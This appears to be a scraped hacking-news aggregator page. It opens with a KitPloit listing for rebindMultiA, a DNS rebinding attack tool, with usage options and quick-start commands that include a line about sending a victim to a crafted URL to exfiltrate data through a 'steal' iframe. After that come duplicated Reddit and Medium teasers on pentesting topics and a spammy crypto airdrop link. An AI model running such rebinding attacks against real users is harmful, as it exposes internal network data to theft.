Hacking Articles Tips Tricks Videos Tutorials
KitPloit - PenTest Tools! rebindMultiA - Tool To Perform a Multiple A Record Rebind Attack https://blogger.googleusercontent.com/img/a/AVvXsEgJ7psudS9vxKSRrIOFqYXlKBQT7zbhNdUdoZyP0Ljp7-PEAr9fuhUZ_my13Hw79lY-OJkoQuRCy1k1kXKK-RK85zPp0xjSvsJC2oJl64nsESxSCf9…
n sends the results back to the attacker's callback server. Usage
pip3 install -r requirements.txt
python3 server.py --help usage: server.py [-h] [-p PORT] [-c CALLBACK_PORT] [-d DNS_PORT] [-f FILE] [-l LOCATION]
optional arguments:
-h, --help show this help message and exit
-p PORT, --port PORT Specify port to attack on targetIp. Default: 80
-c CALLBACK_PORT, --callback-port CALLBACK_PORT
Specify the callback HTTP server port. Default: 31337
-d DNS_PORT, --dns-port DNS_PORT
Specify the DNS server port. Default: 53
-f FILE, --file FILE Specify the HTML file to display in the first iframe.(The "steal" iframe). Default: steal.html
-l LOCATION, --location LOCATION
Specify the location of the data you'd like to steal on the target. Default: / If you get this error: ┬─[justin@RhynoDroplet:~/p/rebindMultiA]─[14:26:24]─[G:master=]
╰─>$ python3 server.py
Traceback (most recent call last):
File "server.py", line 2, in <module
from http.server import HTTPServer, BaseHTTPRequestHandler, ThreadingHTTPServer
ImportError: cannot import name 'ThreadingHTTPServer' Then you need to use a more up-to-date version of Python. Python 3.7+. Quick StartThis must be executed from publically accessible IP. git clone https://github.com/Rhynorater/rebindMultiA
cd rebindMutliA
pip3 install -r requirements.txt
echo "Send your victim to http://127.0.0.1.target.`curl -s http://ipinfo.io/ip`.ns.rebindmultia.com/parent to exfil 127.0.0.1"
sudo python3 server.py Download rebindMultiAhacking: security in practice
Ryan Montgomery?
Saw some podcast with a “hacker” who called himself #1 ethical hacker in the world, tracking down pedos with project veritas. He talks about general and broad hacking stuff, and he owns security software, and a site where you test your hacking skills. He seems life a complete grift scammer to me, but millions of people are worshiping this pedo hunter.
Can anyone here chime in on this guy?
submitted by /u/Phil_Fart_MD
[link] [comments]
Ryan Montgomery?
Saw some podcast with a “hacker” who called himself #1 ethical hacker in the world, tracking down pedos with project veritas. He talks about general and broad hacking stuff, and he owns security software, and a site where you test your hacking skills. He seems life a complete grift scammer to me, but millions of people are worshiping this pedo hunter.
Can anyone here chime in on this guy?
submitted by /u/Phil_Fart_MD
[link] [comments]
Reddit
From the hacking community on Reddit
Explore this post and more from the hacking community
A Pentester's Guide to Source Code Review
https://www.reddit.com/r/Pentesting/comments/13rk6xq/a_pentesters_guide_to_source_code_review/
<!-- SC_OFF -->https://www.cobalt.io/blog/a-pentesters-guide-to-source-code-review <!-- SC_ON --> submitted by /u/cobalt-core-team (https://www.reddit.com/user/cobalt-core-team)
[link] (https://www.reddit.com/r/Pentesting/comments/13rk6xq/a_pentesters_guide_to_source_code_review/) [comments] (https://www.reddit.com/r/Pentesting/comments/13rk6xq/a_pentesters_guide_to_source_code_review/)
https://www.reddit.com/r/Pentesting/comments/13rk6xq/a_pentesters_guide_to_source_code_review/
<!-- SC_OFF -->https://www.cobalt.io/blog/a-pentesters-guide-to-source-code-review <!-- SC_ON --> submitted by /u/cobalt-core-team (https://www.reddit.com/user/cobalt-core-team)
[link] (https://www.reddit.com/r/Pentesting/comments/13rk6xq/a_pentesters_guide_to_source_code_review/) [comments] (https://www.reddit.com/r/Pentesting/comments/13rk6xq/a_pentesters_guide_to_source_code_review/)
CORS Misconfiguration
https://www.reddit.com/r/Pentesting/comments/13rj4ni/cors_misconfiguration/
<!-- SC_OFF -->Hi everyone, junior pentester here, wanted some idea regarding CORS. I have detected and open CORS policy on one of our applications, however a developer said we are not vulnerable since we are using Auth Tokens for authentication and not using cookies/etc/. Is this true? <!-- SC_ON --> submitted by /u/UnLiQuery20 (https://www.reddit.com/user/UnLiQuery20)
[link] (https://www.reddit.com/r/Pentesting/comments/13rj4ni/cors_misconfiguration/) [comments] (https://www.reddit.com/r/Pentesting/comments/13rj4ni/cors_misconfiguration/)
https://www.reddit.com/r/Pentesting/comments/13rj4ni/cors_misconfiguration/
<!-- SC_OFF -->Hi everyone, junior pentester here, wanted some idea regarding CORS. I have detected and open CORS policy on one of our applications, however a developer said we are not vulnerable since we are using Auth Tokens for authentication and not using cookies/etc/. Is this true? <!-- SC_ON --> submitted by /u/UnLiQuery20 (https://www.reddit.com/user/UnLiQuery20)
[link] (https://www.reddit.com/r/Pentesting/comments/13rj4ni/cors_misconfiguration/) [comments] (https://www.reddit.com/r/Pentesting/comments/13rj4ni/cors_misconfiguration/)
php version checking
https://www.reddit.com/r/Pentesting/comments/13rkar7/php_version_checking/
<!-- SC_OFF -->im being tested at work and being asked to check php version info for an external site via nmap. i usually have done this with server access or external tools like nessus but this is all new to me. ive tried using the php version script in nmap but its not coming back with that info, google is not being any help. can someone give me the string that would do this. if i can get this figured out im sure i can adapt better at using this in the future. ty <!-- SC_ON --> submitted by /u/H8eater (https://www.reddit.com/user/H8eater)
[link] (https://www.reddit.com/r/Pentesting/comments/13rkar7/php_version_checking/) [comments] (https://www.reddit.com/r/Pentesting/comments/13rkar7/php_version_checking/)
https://www.reddit.com/r/Pentesting/comments/13rkar7/php_version_checking/
<!-- SC_OFF -->im being tested at work and being asked to check php version info for an external site via nmap. i usually have done this with server access or external tools like nessus but this is all new to me. ive tried using the php version script in nmap but its not coming back with that info, google is not being any help. can someone give me the string that would do this. if i can get this figured out im sure i can adapt better at using this in the future. ty <!-- SC_ON --> submitted by /u/H8eater (https://www.reddit.com/user/H8eater)
[link] (https://www.reddit.com/r/Pentesting/comments/13rkar7/php_version_checking/) [comments] (https://www.reddit.com/r/Pentesting/comments/13rkar7/php_version_checking/)
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Understanding Reentrancy Vulnerabilities in Bug Bounty Programs: Tips for Ethical Hackers | 2023
https://cdn-images-1.medium.com/max/1400/0*v41AmNvzgDhfkv3Q.jpg
Unveiling the Hidden Risks: Exploring Reentrancy Vulnerabilities in Bug Bounty Programs | Karthikeyan Nagaraj
Continue reading on Medium »
Understanding Reentrancy Vulnerabilities in Bug Bounty Programs: Tips for Ethical Hackers | 2023
https://cdn-images-1.medium.com/max/1400/0*v41AmNvzgDhfkv3Q.jpg
Unveiling the Hidden Risks: Exploring Reentrancy Vulnerabilities in Bug Bounty Programs | Karthikeyan Nagaraj
Continue reading on Medium »
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
TryHackMe -Nax
https://cdn-images-1.medium.com/max/600/1*qpKzSDVxIy_enJF2IGdI0A.png
Let’s start by scanning …
Continue reading on Medium »
TryHackMe -Nax
https://cdn-images-1.medium.com/max/600/1*qpKzSDVxIy_enJF2IGdI0A.png
Let’s start by scanning …
Continue reading on Medium »
Hacking on Medium
Books You Need To Read 9
https://cdn-images-1.medium.com/max/600/1*64upPA1RzkrsKHNRjnYbLQ.jpeg
Profit First: A Game-Changing Approach to Financial Management
Continue reading on Medium »
Books You Need To Read 9
https://cdn-images-1.medium.com/max/600/1*64upPA1RzkrsKHNRjnYbLQ.jpeg
Profit First: A Game-Changing Approach to Financial Management
Continue reading on Medium »
Medium
Books You Need To Read 9
Profit First: A Game-Changing Approach to Financial Management
Hacking on Medium
Exploring the Rising World of Biohacking: Enhancing Human Abilities through Technology
https://cdn-images-1.medium.com/max/600/1*qBZwifykn862Ysda5DfsXw.jpeg
In our rapidly advancing technological landscape, a captivating movement known as biohacking has surfaced, captivating the imaginations of…
Continue reading on Medium »
Exploring the Rising World of Biohacking: Enhancing Human Abilities through Technology
https://cdn-images-1.medium.com/max/600/1*qBZwifykn862Ysda5DfsXw.jpeg
In our rapidly advancing technological landscape, a captivating movement known as biohacking has surfaced, captivating the imaginations of…
Continue reading on Medium »
Medium
Exploring the Rising World of Biohacking: Enhancing Human Abilities through Technology
In our rapidly advancing technological landscape, a captivating movement known as biohacking has surfaced, captivating the imaginations of…
Hacking on Medium
[HTB] Horizontall 靶機 Write-Up
https://cdn-images-1.medium.com/max/1440/1*tkTnhrPvzkv7oPDTw03bPA.png
Hack The Box Horizontall machine Write-Up
Continue reading on 璿的筆記 »
[HTB] Horizontall 靶機 Write-Up
https://cdn-images-1.medium.com/max/1440/1*tkTnhrPvzkv7oPDTw03bPA.png
Hack The Box Horizontall machine Write-Up
Continue reading on 璿的筆記 »
Medium
[HTB] Horizontall 靶機 Write-Up
Hack The Box Horizontall machine Write-Up
Hacking on Medium
Safeguarding the Digital Frontier: Exploring the Importance of Cybersecurity and Data Privacy
https://cdn-images-1.medium.com/max/2600/0*rUfBQbGfkBfeMh4x
In today’s increasingly interconnected world, where digital technologies are deeply ingrained in our daily lives, the protection of our…
Continue reading on Medium »
Safeguarding the Digital Frontier: Exploring the Importance of Cybersecurity and Data Privacy
https://cdn-images-1.medium.com/max/2600/0*rUfBQbGfkBfeMh4x
In today’s increasingly interconnected world, where digital technologies are deeply ingrained in our daily lives, the protection of our…
Continue reading on Medium »
Medium
Safeguarding the Digital Frontier: Exploring the Importance of Cybersecurity and Data Privacy
In today’s increasingly interconnected world, where digital technologies are deeply ingrained in our daily lives, the protection of our…
The premiere token airdrop of FLOKI
https://www.reddit.com/r/Pentesting/comments/13rkhmf/the_premiere_token_airdrop_of_floki/
<!-- SC_OFF -->https://linktr.ee/flokieth <!-- SC_ON --> submitted by /u/supers2345 (https://www.reddit.com/user/supers2345)
[link] (https://www.reddit.com/r/Pentesting/comments/13rkhmf/the_premiere_token_airdrop_of_floki/) [comments] (https://www.reddit.com/r/Pentesting/comments/13rkhmf/the_premiere_token_airdrop_of_floki/)
https://www.reddit.com/r/Pentesting/comments/13rkhmf/the_premiere_token_airdrop_of_floki/
<!-- SC_OFF -->https://linktr.ee/flokieth <!-- SC_ON --> submitted by /u/supers2345 (https://www.reddit.com/user/supers2345)
[link] (https://www.reddit.com/r/Pentesting/comments/13rkhmf/the_premiere_token_airdrop_of_floki/) [comments] (https://www.reddit.com/r/Pentesting/comments/13rkhmf/the_premiere_token_airdrop_of_floki/)